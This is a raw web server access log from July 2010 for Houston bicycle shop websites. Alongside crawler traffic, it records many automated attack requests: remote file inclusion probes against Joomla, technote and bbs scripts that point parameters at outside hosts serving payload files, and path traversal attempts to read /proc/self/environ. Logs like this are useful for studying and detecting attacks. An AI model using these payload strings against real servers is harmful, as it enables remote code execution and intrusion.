83.140.191.145 - - [11/Jul/2010:00:58:20 -0700] "GET /logs/access.log//index.php?option=com_mambatstaff&Itemid=&mosConfig_absolute_path=http://www.smarttrain.edu.vn/components/com_wrapper/views/wrapper/tmpl/data/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
195.191.54.159 - - [11/Jul/2010:01:03:42 -0700] "GET /bullitinboard/index.php HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
195.191.54.159 - - [11/Jul/2010:01:03:43 -0700] "GET / HTTP/1.0" 200 1748 "http://www.svbikes.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
195.191.54.159 - - [11/Jul/2010:01:03:44 -0700] "GET /bullitinboard/ HTTP/1.0" 200 517 "http://www.svbikes.com/bullitinboard/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.svbikes.com"
87.250.252.242 - - [11/Jul/2010:01:10:26 -0700] "GET / HTTP/1.1" 200 1764 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
178.154.163.29 - - [11/Jul/2010:01:14:09 -0700] "GET /logs/ HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
87.230.9.75 - - [11/Jul/2010:01:18:14 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
74.50.85.229 - - [11/Jul/2010:01:18:49 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.svbikes.com"
217.19.213.173 - - [11/Jul/2010:01:19:11 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
87.230.9.75 - - [11/Jul/2010:01:32:09 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
87.230.9.75 - - [11/Jul/2010:01:32:09 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.svbikes.com"
217.19.213.173 - - [11/Jul/2010:01:33:59 -0700] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
217.19.213.173 - - [11/Jul/2010:01:34:00 -0700] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.so2alak.com/logs/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:01:35:27 -0700] "GET /bullitinboard/viewtopic.php?p=4074 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
208.80.193.42 - - [11/Jul/2010:01:39:48 -0700] "GET / HTTP/1.0" 200 1748 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; YPC 3.2.0; (R1 1.3); .NET CLR 1.1.4322)" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:01:57:08 -0700] "GET /bullitinboard/viewtopic.php?p=14825 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
89.108.64.232 - - [11/Jul/2010:01:59:16 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:01:59:16 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:01:59:16 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:02:01:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
87.250.252.242 - - [11/Jul/2010:02:05:39 -0700] "GET /logs/access_090910.log HTTP/1.1" 200 6191836 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:23 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:23 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:33 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:34 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:34 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:34 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:36 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:06:36 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:11:10 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:11:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:11:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:11:11 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
77.232.72.10 - - [11/Jul/2010:02:16:28 -0700] "GET /logs/access_100510.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
77.232.72.10 - - [11/Jul/2010:02:16:28 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
77.232.72.10 - - [11/Jul/2010:02:16:28 -0700] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://polotele.fileave.com/scane107.txt?? HTTP/1.1" 404 - "-" "kmccrew Bot Search" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:02:17:21 -0700] "GET /bullitinboard/viewtopic.php?p=15648 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
77.222.34.35 - - [11/Jul/2010:02:25:02 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:25:02 -0700] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:25:02 -0700] "GET /bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:26:53 -0700] "GET /bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:26:53 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:26:53 -0700] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
59.92.117.235 - - [11/Jul/2010:02:27:53 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
59.92.117.235 - - [11/Jul/2010:02:27:55 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
59.92.117.235 - - [11/Jul/2010:02:28:28 -0700] "GET / HTTP/1.1" 200 1764 "http://locator.trekbikes.com/locator/search" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
59.92.117.235 - - [11/Jul/2010:02:28:29 -0700] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:06 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:06 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:07 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:13 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:13 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
91.121.26.63 - - [11/Jul/2010:02:30:13 -0700] "GET /logs/access_100510.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://recky.webs.com/autoid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
89.108.64.232 - - [11/Jul/2010:02:32:14 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:02:33:30 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:02:33:31 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
89.108.64.232 - - [11/Jul/2010:02:33:31 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "houstonbikeshop.com"
118.69.206.77 - - [11/Jul/2010:02:38:14 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
118.69.206.77 - - [11/Jul/2010:02:38:15 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:38:17 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
118.69.206.77 - - [11/Jul/2010:02:38:52 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
118.69.206.77 - - [11/Jul/2010:02:38:54 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:39:04 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:39:04 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:39:04 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
65.60.20.66 - - [11/Jul/2010:02:39:29 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.20.66 - - [11/Jul/2010:02:39:29 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.20.66 - - [11/Jul/2010:02:39:29 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.20.66 - - [11/Jul/2010:02:39:48 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.20.66 - - [11/Jul/2010:02:39:48 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
65.60.20.66 - - [11/Jul/2010:02:39:48 -0700] "GET /logs/access_100510.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://archinfo.net/archidb/ver1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
178.154.163.29 - - [11/Jul/2010:02:39:58 -0700] "GET /bullitinboard/viewtopic.php?p=16812 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
174.34.185.226 - - [11/Jul/2010:02:42:03 -0700] "GET /logs/access.log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:42:03 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
174.34.185.226 - - [11/Jul/2010:02:42:03 -0700] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/57? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/57? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/57? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:43:10 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/ID-RFI.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:44:32 -0700] "GET /logs//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:44:32 -0700] "GET /logs/access.log//bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
77.222.34.35 - - [11/Jul/2010:02:44:32 -0700] "GET /bbs/write_update.php?board_skin_path=http://star.ee.nchu.edu.tw/cpsub/data/auto1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:54:12 -0700] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:54:12 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
208.92.234.103 - - [11/Jul/2010:02:54:12 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://chatelleconcept.com/images/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
178.154.163.29 - - [11/Jul/2010:03:02:54 -0700] "GET /bullitinboard/viewtopic.php?p=14640 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
87.250.252.242 - - [11/Jul/2010:03:12:32 -0700] "GET /logs/ HTTP/1.1" 200 2940 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "bicyclestoreshouston.com"
178.154.163.29 - - [11/Jul/2010:03:22:58 -0700] "GET /bullitinboard/viewtopic.php?p=16095&sid=6b8c0e766a9c906f9ab7b8610c3fd015 HTTP/1.1" 200 533 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)" "www.svbikes.com"
222.236.47.182 - - [11/Jul/2010:03:23:07 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.47.182 - - [11/Jul/2010:03:23:08 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.47.182 - - [11/Jul/2010:03:23:36 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
222.236.47.182 - - [11/Jul/2010:03:23:37 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.221.117.244 - - [11/Jul/2010:03:24:59 -0700] "GET /translations/Norwegian.txt//tools/send_reminders.php?noSet=0&includedir=http://besojena.homelinux.org/tools/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
61.221.117.244 - - [11/Jul/2010:03:24:59 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://besojena.homelinux.org/tools/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
61.221.117.244 - - [11/Jul/2010:03:24:59 -0700] "GET /translations//tools/send_reminders.php?noSet=0&includedir=http://besojena.homelinux.org/tools/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
222.236.47.182 - - [11/Jul/2010:03:25:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "houstonbikeshop.com"
61.221.117.244 - - [11/Jul/2010:03:25:51 -0700] "GET /translations/Icelandic.txt//tools/send_reminders.php?noSet=0&includedir=http://besojena.homelinux.org/tools/id?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.svbikes.com"
